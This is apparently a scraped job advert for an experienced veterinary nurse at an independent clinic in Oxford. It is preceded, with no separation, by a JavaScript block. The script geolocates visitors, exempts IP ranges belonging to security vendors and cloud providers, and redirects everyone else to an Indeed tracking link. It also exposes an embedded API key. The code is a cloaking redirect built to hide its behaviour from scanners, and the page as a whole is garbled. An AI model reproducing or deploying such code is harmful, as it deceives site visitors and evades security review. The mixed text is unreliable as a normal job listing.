Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/13cf400777eed15c/91625eeb353dcb14d4a00a92f9fd6cf346358e9e4f9cf58493226c8206c62c6c/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Join our passionate Vet Nurse team at a vibrant, independently owned Oxford clinic known for delivering exceptional pet care and loyal client relationships.
Our well-established surgery offers a supportive environment with a dedicated team committed to high standards, advanced cases, and a growing service including plans for a 24-hour hospital.
Enjoy flexible hours tailored to your preferences, a strong focus on professional development with CPD opportunities, and a competitive salary up to £36,000. Benefits include company events, pension, cycle scheme, health & dental insurance, and more.
We seek a dedicated RVN or near-qualified nurse with at least 2 years’ experience, excellent communication skills, and a genuine passion for pet care. Relocation to Oxford is required.
If you’re enthusiastic about advancing your career in a friendly, professional team, contact Claire for this rewarding opportunity or refer a colleague. Be part of our family and help us become the best vets in Oxford!